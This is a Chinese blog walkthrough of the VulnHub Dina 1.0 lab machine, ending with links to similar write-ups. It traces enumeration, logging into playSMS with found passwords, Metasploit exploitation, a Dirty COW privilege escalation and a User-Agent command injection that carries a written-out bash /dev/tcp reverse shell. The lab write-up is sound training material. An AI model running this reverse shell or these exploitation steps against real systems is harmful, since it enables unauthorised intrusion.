靶机实战-Dina 1.0

最新推荐文章于 2021-10-29 16:27:28 发布
最新推荐文章于 2021-10-29 16:27:28 发布
阅读量1k 收藏 6
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43870289/article/details/104099394
版权

Dina 1.0靶机实战

文章目录

1、主机发现

在这里插入图片描述
目标IP:192.168.232.157

2、端口扫描

在这里插入图片描述

3、端口详细信息扫描

在这里插入图片描述
只开放80端口

4、访问80端口–http服务

主页啥都没有,直接dirb扫一下目录
在这里插入图片描述
依次访问目录:
在这里插入图片描述
index就是主页,就不看了
发现robot中有五个目录:
在这里插入图片描述
依次访问:
在这里插入图片描述
在这里插入图片描述
其它两个页面跟第一个一样
继续访问:
//在/secure中发现一个zip文件而且可以下载
在这里插入图片描述
下载backup.zip文件,解压发现需要密码
在这里插入图片描述
不知道密码,先pass,去网页源码里看看有没有东西
发现http://192.168.10.181/nothing/源码中有记录密码
在这里插入图片描述
尝试用得到的密码解压,用密码freedom成功解压,解压发现是一个类似mp3的文件
在这里插入图片描述
在这里插入图片描述
用播放器打不开
在这里插入图片描述
用记事本打开:
在这里插入图片描述
发现url :/SecreTSMSgatwayLogin //Login?猜测是登录页面
在这里插入图片描述
果然是,然后尝试使用文件中的用户名touhid,密码freedom登录
在这里插入图片描述
在这里插入图片描述
不对?!,继续依次尝试在nothing源码中找到的密码
在这里插入图片描述
在这里插入图片描述
diana登录成功

在进入后台后,发现是playSMS,可通过metasploit查看相关漏洞看能否利用
在这里插入图片描述
使用use exploit/multi/http/playsms_filename_exec 进行漏洞利用
在这里插入图片描述
添加渗透攻击模块中的参数
在这里插入图片描述
exploit执行后成功,获取meterpreter权限
//上面两个exploit都可以获得meterpreter权限

5、提权

//查看内核版本,用脏牛提权
在这里插入图片描述
编译and执行:
在这里插入图片描述
在这里插入图片描述
提权成功

提权方式二

在网页中发现文件上传,并发现要求上传CSV文件:
在这里插入图片描述
但不知道文件上传后的路径在哪,所以文件上传漏洞没法使用
用searchsploit命令查询后门文件:
在这里插入图片描述
发现本页面后门文件42044.txt,查看其内容
在这里插入图片描述
根据文件所说,将命令写入表格:
在这里插入图片描述
去页面进行文件上传并抓包:
在这里插入图片描述
根据文件中提示,将user-agent修改为想要执行的命令,发现成功执行
在这里插入图片描述
利用此命令执行漏洞,进行反弹shell:
echo “bash -i>&/dev/tcp/192.168.232.130/1234 0>&1” | bash
在这里插入图片描述
点击GO,查看kali//kali提权开启监听
在这里插入图片描述
拿到shell,接下来提权
利用脏牛提权://下载dirty.c
因为上面已经用过脏牛提权,重新做的话要删除,重来,所以就不再做了
在这里插入图片描述
在这里插入图片描述

滕财然
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机
Vulhub靶场之Dina-1.0.1
weixin_45650977的博客
04-30 728
Vulhub靶场之Dina-1.0.1 靶机描述 环境准备 vmware15 打开 攻击机:kali NAT模式 靶机Dina1.0.1 NAT模式
靶机:Quaoar
AzVoidSUN的博客
06-23 636
运行环境 本靶机提供了OVA格式的镜像,官方推荐使用virtualbox,从Vulnhub下载之后,导入到viirtualbox即可运 行。 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 本靶机的渗透目标为渗透进靶机,找到flag,并拿到root权限。 开始 首先查看本机ip 192.168.1.25 nmap扫一下网段 发现主机 访问下80端口 扫描下目录 发现后台登陆的地方 弱口令admin登陆成功 点击修改404界面 我直接把php反弹she
靶机【B2R】Dina-1-0-1
干铮的博客
09-27 394
【B2R】Dina-1-0-1 1.信息收集 根据靶机MAC地址获取IP。 Nmap -sP 192.168.43.0/24 Nmap 192.168.43.91 -A -p- -oN nmap.A 2.网页信息收集 访问站点 御剑扫描敏感目录 敏感目录 http://192.168.43.91/nothing/ 后台备份文件 解压文件尝试使用之前留给的密码 freedom 使用文本打开文件 访问http://192.168.43.
web靶机系列-命令注入
rlenew的博客
05-28 780
主机:192.168.136.133 靶机:192.168.136.139 用nmap、nikto扫描操作 发现在robots.txt下存在五个文件 在nothing的页面源代码下发现有五个密码 在刚刚的nikto的扫描中存在一个/secure/文件,打开发现一个压缩包 压缩包需要密码,经测试密码是freedom,但解压后的文件是txt文件。需要更改文件后缀,得到 登陆给出的网址,输入账户。密码再测试一下,发现是diana 用searchsploit查找页面架构下了漏洞 第一个可利用漏洞是
kali渗透综合靶机(十三)--Dina 1.0靶机
WY92139010的博客
06-03 659
kali渗透综合靶机(十三)--Dina 1.0靶机 一、主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24    二、端口扫描 1. masscan --rate=10000 -p0-65535 192.168.10.181    三、端口服务识别 1. nmap -sV -T4 -O -p ,80 192.168.10.181 ...
渗透测试实战-Fowsniff靶机入侵-附件资源
03-02
渗透测试实战-Fowsniff靶机入侵-附件资源
靶机GoldenEye-V1练习报告1
08-08
靶机GoldenEye-V1练习报告1
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Dina靶机渗透
weixin_44769042的博客
10-10 456
挺有意思的一个靶机 目录 主机发现 端口扫描 目录扫描 去web端看看,开始渗透 反弹shell 方法1 方法2 提权 尝试1-失败 尝试2-脏牛提权-成功 主机发现 netdiscover -i eth0 -r 192.168.129.0/24 端口扫描 扫描端口的服务版本,服务器操作系统,中间件等信息 目录扫描 去web端看看,开始渗透 看了看页面也没啥有用信息 一个提交信息 只是爆出服务器中间件版本然后也不能操作什么 还有一个链.
靶机测试--Dina
ximo的博客
03-28 281
目录信息收集主机发现端口扫描目录扫描漏洞发掘提权总结 信息收集 主机发现 端口扫描 只有80端口: 目录扫描 访问每一个可以访问的路径: 主页: nothing/pass: secure/: 漏洞发掘 得到了一个类似密码字典,一个zip文件。 下载zip文件: 需要密码,使用获得的密码freedom,解压后为mp3格式,但是无法播放: 使用文本打开: 获得了用户名和一个后台,打开: 使用diana可以成功登录: 网站框架为playsms。 搜索CMS漏洞: 有三个属于msf,使用msf
CTF之命令注入(Dina 1.0
afei001
04-01 542
练习环境     攻击机:kali     靶机:Ubuntu 12.04(Dina 1.0) 1.发现靶机,进行端口扫描 root@afei:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.3.150 netmask 255.255....
【B2R】DINA1.0.1
qq_44339430的博客
03-24 356
【B2R】DINA:1.0.1 靶场地址:https://www.vulnhub.com/entry/dina-101,200/ 靶场信息 靶场描述 Description Back to the Top Welcome to Dina 1.0.1 ________ _________ \________\--------___ ___ ____----------/______
【VulnHub靶机渗透】四:Dina-1
野原新之助
04-13 782
靶机设定一些线索,引导用户得到相关信息,并使用了一个包含漏洞(代码执行)的Web应用系统版本。 VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成(万分感谢提供靶机镜像的同学)。
靶机记录(一):Dina
weixin_47306547的博客
10-29 186
目录 主机发现 端口扫描 Web渗透 目录扫描 信息利用 GetShell 提权 清痕迹,留后门 主机发现 端口扫描 Web渗透 目录扫描 信息利用 GetShell 提权 清痕迹,留后门
一次失败的vulnhub靶机渗透之breach1.0
weixin_44255856的博客
08-06 1377
靶机地址下载https://pan.baidu.com/s/1KuwK_8MqCWhcIcNpTJ-OLQ 这是靶机的介绍 在一个由多个部分组成的系列文章中,Breach 1.0是一个初学者到中级boot2root/CTF挑战。解决问题需要扎实的信息收集和坚持不懈的努力。千方百计。 VM配置了一个静态IP地址(192.168.110.140),因此您需要将您的主机专用适配器配置到这个子网。 非常...
靶机-SickOs 1.2 Walkthrough
banacyo14206的博客
08-22 265
SickOs:1.2 https://www.vulnhub.com/entry/sickos-12,144/ 参考:https://www.cnblogs.com/yuzly/p/10854392.html 提权辅助工具LinEnum下载:https://download.csdn.net/download/weixin_41082546/11609409提权辅助工具linu...
齐博1.0全版本后台getshell漏洞复现
wanwan的博客
04-02 1722
思路整理并详细说明了一下01用户登陆判断的地方admin/global.php在用户不存在地方呢执行了一个eval():eval(base64_decode("Y$webdb[_Notice]"));该参数打印出来:copy("http://www.php168.com/Notice/?url=$webdb[www_url]",PHP168_PATH."cache/Notice.php");将一个...
vulnhub靶机-jangow: 1.0.1
最新发布
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值